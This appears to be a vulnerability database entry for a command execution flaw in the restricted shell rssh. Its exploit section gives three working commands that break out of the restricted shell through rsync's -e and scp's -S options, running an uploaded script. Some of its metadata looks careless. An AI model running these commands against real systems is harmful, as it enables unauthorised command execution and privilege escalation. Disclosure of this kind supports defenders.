vendor:
rssh
by:
Unknown
7.5
CVSS
HIGH
Remote Arbitrary Command Execution
77
CWE
Product Name: rssh
Affected Version From: All versions of rssh
Affected Version To: All versions of rssh
Patch Exists: NO
Related CWE: CVE-Unknown
CPE: rssh
Platforms Tested:
Unknown
Remote Arbitrary Command Execution in rssh
rssh is prone to a remote arbitrary command execution vulnerability. This issue may allow a remote attacker to execute commands and scripts on a vulnerable computer and eventually allow an attacker to gain elevated privileges on a vulnerable computer. The vulnerability can be exploited using the following commands:1. ssh restricteduser@remotehost 'rsync -e "touch /tmp/example --" localhost:/dev/null /tmp'2. scp command.sh restricteduser@remotehost:/tmp/command.sh3. ssh restricteduser@remotehost 'scp -S /tmp/command.sh localhost:/dev/null /tmp'
Mitigation:
No known mitigation or remediation is available for this vulnerability.